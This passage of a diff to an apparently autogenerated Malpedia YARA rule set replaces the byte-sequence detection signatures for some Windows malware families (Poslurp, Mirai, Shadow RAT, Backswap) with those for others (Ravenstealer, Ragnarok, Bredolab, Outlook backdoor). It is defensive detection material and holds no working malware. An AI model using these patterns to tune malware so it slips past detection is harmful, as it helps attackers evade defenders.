-		$sequence_20 = { 3c41 7204 3c5a 763e 3c61 7204 3c7a }
-		$sequence_21 = { ff15???????? 85c0 8bd8 0f8560020000 8a442431 3c02 }
-		$sequence_22 = { 4885c0 488bd8 742f 8d4f01 448bce }
-		$sequence_23 = { 488bc3 48c1e80c 4833d8 488bc3 48c1e019 4833d8 488bc3 }
-		$sequence_24 = { eb0a 8b45ec 83c410 5e 5f }
-		$sequence_25 = { 8945e8 7442 ebcf 8b45dc b931000000 8b15???????? }
-		$sequence_26 = { 83ec28 31c0 31c9 8945fc }
-		$sequence_27 = { e8???????? 8d0d84308702 31d2 8b75f0 89460c 890c24 }
-		$sequence_28 = { 8b4dec 89c2 83c201 89ce }
-		$sequence_29 = { 31c9 ba03000000 8d75f1 83ec0c }
-		$sequence_30 = { 8d95f1fbffff c785ecfbffff00000000 8db5ecfbffff 8b3d???????? 56 68ff030000 52 }
-		$sequence_31 = { 8995d8fbffff 89b5d4fbffff e8???????? 83c40c 8b85d4fbffff 50 e8???????? }
-		$sequence_32 = { 8b7138 891424 c744240400000000 89742408 8945dc e8???????? 8b45e0 }
-		$sequence_33 = { 894de0 0f84ca000000 8b45cc 8b08 8b55ec 035010 }
-		$sequence_34 = { 8b4048 8945b0 8b45b4 8b4040 8945ac }
-		$sequence_35 = { 51 ffd0 8b0d???????? 8b95e4fbffff }
-		$sequence_36 = { 8b8dccfbffff 51 8bb5e0fbffff 56 }
-		$sequence_37 = { 89442404 c744240800000000 8954240c 8b4590 894d80 ffd0 }
-		$sequence_38 = { 89cf 83c710 89957cffffff 898d78ffffff 89bd74ffffff 89b570ffffff }
-		$sequence_39 = { 890c24 c744240400000000 8955dc e8???????? 8d0d77318702 890424 894c2404 }
+		$sequence_0 = { 33f0 8b442440 0b442438 33cf 23442448 8b7c2444 8b5c2440 }
+		$sequence_1 = { 33c0 f644240401 7405 b800000200 f644240402 7405 }
+		$sequence_2 = { 33ed 0be9 33f5 8b6c244c 0fa4dd19 c1e807 c1e319 }
+		$sequence_3 = { 5e c3 56 8d7010 e8???????? 5e c3 }
+		$sequence_4 = { 0bcd 33f1 8b4c2434 0b4c242c c1e807 c1e319 0bc3 }
+		$sequence_5 = { 3bc6 741c 3930 7418 }
+		$sequence_6 = { 134c241c 01442438 89442458 8b442420 114c243c 8bf8 0facdf1c }
+		$sequence_7 = { 8b4708 89460c 8b4704 894610 8b4714 894614 8b442408 }
+		$sequence_8 = { 5f 5b 5d c3 55 8bec 81ecd8000000 }
+		$sequence_9 = { 59 85db 742f 56 ff742414 }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Poslurp_Auto : FILE
+rule MALPEDIA_Win_Makloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de29f131-c10c-5b1a-9ede-2dfe5ee182bf"
+		id = "26ebb112-b6ed-51a4-bad8-c324e66e4906"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poslurp_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makloader_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "dafce983a197626ced3ffe7ea55c9454b2349c0bd7691c948d5ed2bf42cf11d0"
+		logic_hash = "854a6b1744de222da9ac653a892bbe0900bac42ce1325f6f01c3e73dc26cfb28"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146966,32 +146823,32 @@ rule MALPEDIA_Win_Poslurp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883f8ff 743d 448d4f02 4533c0 33d2 488bc8 }
-		$sequence_1 = { 3905???????? 7309 33c9 ff15???????? }
-		$sequence_2 = { 44891d???????? eb0b 6689445420 41ffc0 48ffc2 4883c9ff 33c0 }
-		$sequence_3 = { 48f7d1 4883e901 7458 448b0d???????? }
-		$sequence_4 = { 4c8bf0 488bf8 33c0 f3aa 498bce 488bd5 }
-		$sequence_5 = { 740e 0f1f4000 488b1b 66837b3818 }
-		$sequence_6 = { ff15???????? 4883f830 0f85b3000000 817c245000100000 }
-		$sequence_7 = { 4d897b08 4d897bc8 8b7c0850 4c8bf2 488be9 4d897ba0 }
-		$sequence_8 = { 0f84d5000000 6666660f1f840000000000 0fb703 ffc9 83e830 }
-		$sequence_9 = { ffce 488bd5 48d1f9 8bfb 85c9 }
+		$sequence_0 = { 6bca00 8b440dbc 8b540dc0 b127 }
+		$sequence_1 = { c7857cebffff00000000 c78580ebffff00000000 8d8554e5ffff 898584ebffff c78588ebffff00000000 8d8d74ebffff }
+		$sequence_2 = { 33d2 8b45fc 83c003 8810 8b45fc 8be5 }
+		$sequence_3 = { a1???????? 33c5 8945fc c745c000100000 }
+		$sequence_4 = { 8b94d530fdffff b103 e8???????? 0bd8 8b8520fdffff 0bc2 33f3 }
+		$sequence_5 = { e8???????? 8818 ebbf 6a09 8b4df8 83c101 e8???????? }
+		$sequence_6 = { 8b540dc0 b122 e8???????? 8bd8 }
+		$sequence_7 = { 89856ce6ffff 33d2 899514e5ffff 899518e5ffff }
+		$sequence_8 = { 8b08 8b55cc 52 8b410c }
+		$sequence_9 = { 884130 ba01000000 6bc230 8b4d08 0fb61401 52 8b4dfc }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Scarecrow_Auto : FILE
+rule MALPEDIA_Win_Ravenstealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4797137-49f1-5101-9dc1-24aec16a402a"
+		id = "84f90220-3279-5007-a5a1-8ce5ade31449"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scarecrow_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ravenstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ravenstealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3c26486fac68aa14cbad0f26e91bc7559e11337af778c6912a8bda339578018a"
+		logic_hash = "79823541f3a380244fa96c3e3bd68dec6432b3566c33a9fa586cf37babf2bf66"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147005,32 +146862,32 @@ rule MALPEDIA_Win_Scarecrow_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645d951 c645da70 c645db4c c645dc70 c645dd2b c645de70 c645df16 }
-		$sequence_1 = { c645d55b c645d678 c645d77c c645d878 c645d928 c645da78 c645db7c }
-		$sequence_2 = { 40 74ec 5f 5e b801000000 5b }
-		$sequence_3 = { 56 6a49 68d340dedd ba0f000000 8bf1 e8???????? 83c408 }
-		$sequence_4 = { 99 f7fb 85d2 74d8 8a06 8bde 84c0 }
-		$sequence_5 = { 757b b905000000 8b45fc 99 f7f9 85d2 7405 }
-		$sequence_6 = { be05000000 0f1f440000 8b45b8 99 f7fe 85d2 7405 }
-		$sequence_7 = { 59 e9???????? c745dc03000000 eb7c c745e030024300 ebbb d9e8 }
-		$sequence_8 = { c745e030024300 e9???????? 83e80f 7451 83e809 7443 83e801 }
-		$sequence_9 = { 7528 e8???????? 85c0 0f847f020000 e8???????? 6a4d }
+		$sequence_0 = { 4c8b742430 4883c438 415f 415c 5f 5b c3 }
+		$sequence_1 = { f20f5cc8 f20f59ca f20f114c2440 e8???????? 440fbef0 e8???????? 0fbed8 }
+		$sequence_2 = { c744247809000000 eb58 448d3c37 0fbe05???????? 4103c7 0fbe0d???????? 33d2 }
+		$sequence_3 = { 8b5c2450 8b742454 3bc1 0f84bb130000 0fb605???????? 0fb605???????? 0fb605???????? }
+		$sequence_4 = { f20f59c8 f2440f2cf1 8b85e01f0000 83c04c f20f2ad0 0fb605???????? 0fbec8 }
+		$sequence_5 = { f2480f2ac0 f20f594590 f20f2cc0 89442428 8b442458 83e86a 660f6ed0 }
+		$sequence_6 = { e8???????? 488bf8 488d9424b0000000 488d8c2450090000 e8???????? 488b18 488d9424b8000000 }
+		$sequence_7 = { 85c0 7416 81a5fc030000fffeffff 488d8d28100000 e8???????? 4883c420 5d }
+		$sequence_8 = { 83f801 750a 488b07 488bcf ff5008 90 4d85f6 }
+		$sequence_9 = { 7406 6683f92f 7504 4883c002 483bd8 7442 0f1f8000000000 }
 
 	condition:
-		7 of them and filesize < 501760
+		7 of them and filesize < 8337408
 }
-rule MALPEDIA_Win_Beardshell_Auto : FILE
+rule MALPEDIA_Win_Ragnarok_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fef5153-0695-5651-88d6-fa2574fcc87d"
+		id = "0503ca8a-2001-56e1-b42c-037f05f91d96"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beardshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beardshell_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ragnarok_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "104b3d19aef271122113e5b1a20be0ecaabcd5f4198f381800365cc8cf878c7b"
+		logic_hash = "5619f0dd5fd5026a251efa6637f932f898dc57a4a8452621caeee9cc8878df0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147044,32 +146901,32 @@ rule MALPEDIA_Win_Beardshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d55c0 498bcc 488b4038 ff15???????? 410fbaed0e 4183cd20 44896c243c }
-		$sequence_1 = { 8a44246f 4c8b4c2460 488b542460 448a442440 88442420 e8???????? 4889442470 }
-		$sequence_2 = { e8???????? 488b4c2430 4c8d442460 4983c008 488d542458 e8???????? 488b4c2470 }
-		$sequence_3 = { e9???????? 488b8424b8000000 4889842488000000 4c8b442458 48634c2448 31c0 4829c8 }
-		$sequence_4 = { 488b4010 4883e00f 4889442448 48837c244800 0f84ce000000 488b442450 }
-		$sequence_5 = { 0fbf1448 c1ea02 b901000000 84d1 7510 837d4004 7594 }
-		$sequence_6 = { 410f104500 f30f7f4587 48897c2420 440fb74c2440 4c8d4587 488d55b7 488bce }
-		$sequence_7 = { e9???????? c644245f31 8b442460 83e87f 89442458 488b842480000000 483b842488000000 }
-		$sequence_8 = { 4889c1 488b442430 48894c2440 488b4c2450 48894810 66448b44245e 488b542450 }
-		$sequence_9 = { e8???????? e9???????? 488b4c2448 e8???????? 488b4c2430 6689c2 e8???????? }
+		$sequence_0 = { c1f906 57 6bf838 894df4 8b048d28754300 8b540718 8955ec }
+		$sequence_1 = { 8945b8 8b45a8 8bc8 2345b0 f7d1 234d98 c1c20a }
+		$sequence_2 = { 0f1f4000 8bc8 8b4104 85c0 75f7 895104 8b9db4feffff }
+		$sequence_3 = { 8bc6 f7d0 c1c208 03550c 0bc7 33c3 8955bc }
+		$sequence_4 = { 8b96e0000000 83fa14 7d38 8d0492 8d0c86 8d0492 c781e4000000e0b04000 }
+		$sequence_5 = { 8b7d08 0fb6ca 333c8d105d4300 8bcf 897d08 334814 894d08 }
+		$sequence_6 = { 3a8a54d84200 7532 8b06 8a08 40 42 8906 }
+		$sequence_7 = { c1c10a 89459c 81c6a1ebd96e 8bc2 894d98 }
+		$sequence_8 = { 234db4 03c3 894598 8b45b8 23c2 c145b80a 0bc8 }
+		$sequence_9 = { 8b0c8d28754300 88440f2b 83fa03 7511 8b45fc 8b0c8528754300 8a06 }
 
 	condition:
-		7 of them and filesize < 2416640
+		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Mirai_Auto : FILE
+rule MALPEDIA_Win_Xfscashncr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6b007e0f-a886-5f64-abd3-07f6ed5e9b2a"
+		id = "08fa1629-5d24-53b4-85f4-eb31463ca09f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mirai_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xfscashncr_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "63027a45f46dffdd65577fa0ba420730c7c3c1478a8b6e1e30240b9df0cbea70"
+		logic_hash = "6e03028d0cfd23b56ac82a98bfd4131d910eac7c39a1c7a0b0fafa796b30a166"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147083,32 +146940,32 @@ rule MALPEDIA_Win_Mirai_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b00 8b4dfc 668b00 668981a00b0000 8b4508 8b00 40 }
-		$sequence_1 = { e8???????? 59 50 ff7508 8b4da0 e8???????? 0fb6c0 }
-		$sequence_2 = { c3 8d88dfa9ffff 83f95d 7709 0fb704458ebf6b00 c3 8d90dfa8ffff }
-		$sequence_3 = { 8bcf e8???????? 8b38 85ff 7447 8b4f08 51 }
-		$sequence_4 = { 8b9654040000 68b3fe654f 51 6a64 6a02 68???????? 52 }
-		$sequence_5 = { 8bce e8???????? 8bf8 3bfb 0f840cffffff 8bce e8???????? }
-		$sequence_6 = { c3 bac8c50000 663bc2 720a b9f0c50000 663bc1 7610 }
-		$sequence_7 = { ff15???????? 8945fc 837dfc00 7c33 ff75f8 ff15???????? 8945fc }
-		$sequence_8 = { 8b85d4fdffff 8a00 8885cffdffff ff85d4fdffff 80bdcffdffff00 75e3 8b85d4fdffff }
-		$sequence_9 = { 8b5e08 eb12 8b4e08 8b4604 6a00 52 51 }
+		$sequence_0 = { 741b 0fbe4d82 85c9 7413 8b4d10 e8???????? 0fbe10 }
+		$sequence_1 = { 8b4d18 e8???????? 8b8564ffffff 50 0fb64d1c 51 8b5514 }
+		$sequence_2 = { c1f805 8b4de0 83e11f c1e106 030c85c0195700 894de4 8b55e4 }
+		$sequence_3 = { 8d450c 50 e8???????? 83c408 0fb6c8 85c9 742a }
+		$sequence_4 = { 004fed 4e 0015???????? ed 4e 0000 0501050205 }
+		$sequence_5 = { 8955f4 8b450c 8b4d18 8d14c1 8955f8 8b4508 50 }
+		$sequence_6 = { 8b45d0 8b0c85c0195700 81c100080000 394de4 7366 8b55e4 c6420400 }
+		$sequence_7 = { d1f8 b902000000 c1e100 8b5508 0fb70c0a c1e10f 0bc1 }
+		$sequence_8 = { 8b55fc 0fb7040a 85c0 752f b902000000 c1e100 8b55fc }
+		$sequence_9 = { 0fb755a4 52 6a01 8b4524 50 8d4dd4 e8???????? }
 
 	condition:
-		7 of them and filesize < 7086080
+		7 of them and filesize < 3126272
 }
-rule MALPEDIA_Win_Shadow_Rat_Auto : FILE
+rule MALPEDIA_Win_Cabart_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cd866f0d-a058-5516-ad44-83c67b926cef"
+		id = "f125e8a4-ec32-5390-8552-f2a98b622d63"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadow_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shadow_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cabart_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "f9ac6b211213f8898a8d9a850cbd590282d120dd08d8f19a3ecf3df1330c81a4"
+		logic_hash = "61ecd8ce7a25b1013cbbef59f59ac25a4742d00a8fbf8c91414650d5dc932d94"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147122,32 +146979,32 @@ rule MALPEDIA_Win_Shadow_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b8580000000 483bc6 0f82f1060000 482bc6 49c7c0ffffffff }
-		$sequence_1 = { 5f c3 488b542468 488d0db6590300 e8???????? 4c8b18 }
-		$sequence_2 = { e8???????? 448ba570010000 8b4c2438 488d15b7e5fcff 2b4c2448 41b826000000 894c2438 }
-		$sequence_3 = { 488b8c2430010000 4833cc e8???????? 4881c448010000 415e 415c 5e }
-		$sequence_4 = { 488d5570 4883bd880000000f 490f47d5 4533e4 4c89642420 4533c9 448b8580000000 }
-		$sequence_5 = { 488bf1 48894c2428 488bea 7603 488b2a 4c8b6210 48899c2480010000 }
-		$sequence_6 = { 488b5928 4885db 750d 488d5930 eb07 488d1d785b0400 33d2 }
-		$sequence_7 = { 664489bd1e010000 ebc2 418bff 488d15009d0100 488bcb e8???????? 4885c0 }
-		$sequence_8 = { e8???????? 90 0f57c0 0f11442458 660f6f0d???????? f30f7f4c2468 c644245800 }
-		$sequence_9 = { 488bcf e8???????? 90 488d4c2450 e8???????? 488bc7 488b4d50 }
+		$sequence_0 = { 57 be04010000 8d85d8fbffff 56 }
+		$sequence_1 = { 5f 40 5e c9 c21000 53 }
+		$sequence_2 = { 55 a3???????? ffd6 68???????? ff742414 a3???????? ffd6 }
+		$sequence_3 = { 395d10 740f 6800800000 53 ff7510 }
+		$sequence_4 = { ff15???????? ff15???????? 57 3db7000000 }
+		$sequence_5 = { 761e 8b450c 8930 8b4510 eb16 }
+		$sequence_6 = { 8d85fcfeffff 68???????? 6804010000 50 ff15???????? 83c410 6a10 }
+		$sequence_7 = { 3bf3 0f8499000000 53 53 53 53 }
+		$sequence_8 = { 57 ff15???????? 83c428 33c0 5f }
+		$sequence_9 = { 6a02 57 6a01 6800000040 8d85fcfbffff }
 
 	condition:
-		7 of them and filesize < 727040
+		7 of them and filesize < 32768
 }
-rule MALPEDIA_Win_Backswap_Auto : FILE
+rule MALPEDIA_Win_Net_Star_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0b4784b7-cd96-5e54-a073-0338b4b75481"
+		id = "e4a1e4d6-66ac-52a3-a1bf-1a40ab526cfc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backswap_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.net_star"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.net_star_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "2b5d3806ddf0898828d393c845cc1b722a49353e80ebab2271198eaec3b3ad5a"
+		logic_hash = "93e5fe016bec66ccfdfdaabf1a580d9d03655d26419d498170f8b7ee102df278"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147161,32 +147018,32 @@ rule MALPEDIA_Win_Backswap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 e9???????? b32a 397d14 7412 47 8a07 }
-		$sequence_1 = { f366a5 59 5f 5e c9 c20c00 55 }
-		$sequence_2 = { eb04 8bc6 91 41 5e 5f }
-		$sequence_3 = { 74c4 3c2a 7508 8bdf 897508 4e ebb8 }
-		$sequence_4 = { 33d2 8bdf 4b eb1c 85c9 7508 3bdf }
-		$sequence_5 = { 7482 8b7508 ff4508 8bfb 3bd3 0f8572ffffff 33c9 }
-		$sequence_6 = { 7404 8bce 8bd3 397d14 0f8e99000000 39750c 7e7b }
-		$sequence_7 = { d1e9 f366a5 59 5f 5e }
-		$sequence_8 = { e8???????? 74ed 33c0 eb04 }
-		$sequence_9 = { 33c9 e9???????? b32a 397d14 }
+		$sequence_0 = { 281f00000a 1106 281e00000a dc 1109 6f2500000a 1109 }
+		$sequence_1 = { 6f2400000a 6f2200000a de0f 1107 281f00000a }
+		$sequence_2 = { 728d000070 2a 07 2802000006 1305 281a00000a }
+		$sequence_3 = { 740100001b 0c 03 7243000070 6f1500000a }
+		$sequence_4 = { 1308 1108 731d00000a 1309 1109 }
+		$sequence_5 = { 09 281100000a 5a 281200000a 1304 08 09 }
+		$sequence_6 = { 08 09 1104 281300000a a2 09 }
+		$sequence_7 = { 6f1700000a 6f1500000a 740100001b 0d 09 2d06 725f000070 }
+		$sequence_8 = { 09 08 8e 69 32dd 08 }
+		$sequence_9 = { 26 de49 130a 1109 6f2100000a 1109 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Explosive_Rat_Auto : FILE
+rule MALPEDIA_Win_Bredolab_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fcdedcfb-8d9a-5318-b6f5-1c975904e20d"
+		id = "e9ae7558-41e9-5f48-a345-a8a0a59274ec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.explosive_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bredolab_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "41c4f7e33c52dbbd452e704e97d77f2addf0978f42a72a996b63009951e0b21e"
+		logic_hash = "b7fcc4ad5e8f568651dead1485597f16282b873ba030d633458bd92c7562859d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147200,74 +147057,71 @@ rule MALPEDIA_Win_Explosive_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f84fb000000 68???????? 68???????? ffd6 85c0 0f84e7000000 }
-		$sequence_1 = { 72cc 5d 8b442428 be10000000 3bc6 720d }
-		$sequence_2 = { 8d4514 50 8d4d0c e8???????? 84c0 8b7520 }
-		$sequence_3 = { 8902 8908 894104 5b c20400 894208 8908 }
-		$sequence_4 = { 89bdc4010000 89bdc8010000 6689bdd4010000 e8???????? 8bb508040000 83c41c }
-		$sequence_5 = { e8???????? 3bfb 745b 395d14 7539 6a34 e8???????? }
-		$sequence_6 = { 8d8d44ffffff e8???????? 8d8d04f5feff e8???????? 8b8558ffffff 8985f801ffff 89853402ffff }
-		$sequence_7 = { 3bfb 745b 395d14 7539 6a18 e8???????? 59 }
-		$sequence_8 = { 8d8d44ffffff e8???????? 8d8d7cffffff e8???????? 807d2475 0f8537010000 53 }
-		$sequence_9 = { 663bf2 771d 7220 41 41 40 40 }
+		$sequence_0 = { c3 55 89e5 56 53 8b5508 8b4d0c }
+		$sequence_1 = { 75be 8b8348080000 40 898348080000 }
+		$sequence_2 = { 7424 8b5514 c60200 8d85e0f7ffff 89442404 c7042400080000 ff15???????? }
+		$sequence_3 = { 89853cfcffff ff15???????? 51 66c78560ffffff0800 c744240408020000 c7042400000000 ff15???????? }
+		$sequence_4 = { c7834808000000000000 c7442404???????? 8d4314 890424 ff15???????? }
+		$sequence_5 = { ff15???????? 57 57 8b45e4 89442404 8b4510 890424 }
+		$sequence_6 = { 895c2424 89542420 c744241c00000000 c744241800000000 }
+		$sequence_7 = { 84c0 75f6 894d14 8b5d14 c60300 8b4d0c 8b8560ffffff }
+		$sequence_8 = { 8b450c 8b5510 8d1c07 85c0 740a 807bff3f 7404 }
+		$sequence_9 = { 89d6 31db 6690 80be5409000000 7523 b030 }
 
 	condition:
-		7 of them and filesize < 855040
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Lock_Pos_Auto : FILE
+rule MALPEDIA_Win_Ayegent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66d7719a-09f7-5449-96c8-7a2badb35721"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lock_pos_auto.yar#L1-L147"
+		id = "ced11e8d-8efd-5b26-929c-fa1cb31d81f3"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ayegent_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "68264cf97fe11e22f20de5aa9fd8236aae89e24686e8c6b06c621f87466b5d04"
+		logic_hash = "ba5d5de854dff7a7f643a8b1e7c7fe4de58085b126949eb8bd1d550389e21c48"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 8b4508 8b0d???????? 8b0481 }
-		$sequence_1 = { 8bec 837d0800 7704 33c0 }
-		$sequence_2 = { 6a00 6a23 6a00 ff15???????? 8d8df8fdffff }
-		$sequence_3 = { 55 8bec 81eca4040000 56 }
-		$sequence_4 = { 8d85f8fdffff 50 6a00 6a00 6a23 }
-		$sequence_5 = { 6a00 32db e8???????? 8bf8 59 59 85ff }
-		$sequence_6 = { 8b450c 85c0 740a 8b55f8 8911 8b4dfc 8908 }
-		$sequence_7 = { ff15???????? 85c0 7555 57 6a04 8d45e4 50 }
-		$sequence_8 = { 8b4de4 034804 894de4 8b55f0 8b45f0 034204 8945f0 }
-		$sequence_9 = { 6a04 8b4508 50 8d4dec 51 e8???????? 83c40c }
-		$sequence_10 = { 8908 837df400 740b 8b55f4 }
-		$sequence_11 = { 837dfc00 7414 8b450c 50 8b4d08 51 }
-		$sequence_12 = { 8b45dc 83e801 8945dc 85d2 0f843a010000 8b4df4 668b11 }
+		$sequence_0 = { a1???????? 8d542400 52 50 ff15???????? 8b4c2428 8b542424 }
+		$sequence_1 = { 51 6804010000 aa e8???????? 83c408 ffd5 }
+		$sequence_2 = { 885c2420 f3ab 66ab 8d4c2420 51 6804010000 aa }
+		$sequence_3 = { 770e 8088????????20 8ac8 80e920 ebe0 80a0609d400000 40 }
+		$sequence_4 = { ff15???????? 8d542420 50 52 8d442428 68???????? }
+		$sequence_5 = { 8d7c2421 885c2420 f3ab 66ab 8d4c2420 51 }
+		$sequence_6 = { 6808020000 50 53 68???????? 68???????? 885c2428 ffd5 }
+		$sequence_7 = { 66ab aa 8d442408 56 50 }
+		$sequence_8 = { 53 68???????? 8d4c2428 68???????? 51 68???????? }
+		$sequence_9 = { 66ab aa 8d442420 50 6a00 e8???????? }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Synflooder_Auto : FILE
+rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9b4db3a4-161f-5f48-96b1-18c835e76606"
+		id = "a3c9e166-1016-5506-93a9-19667db3083c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.synflooder_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.outlook_backdoor_auto.yar#L1-L128"
 		license_url = "N/A"
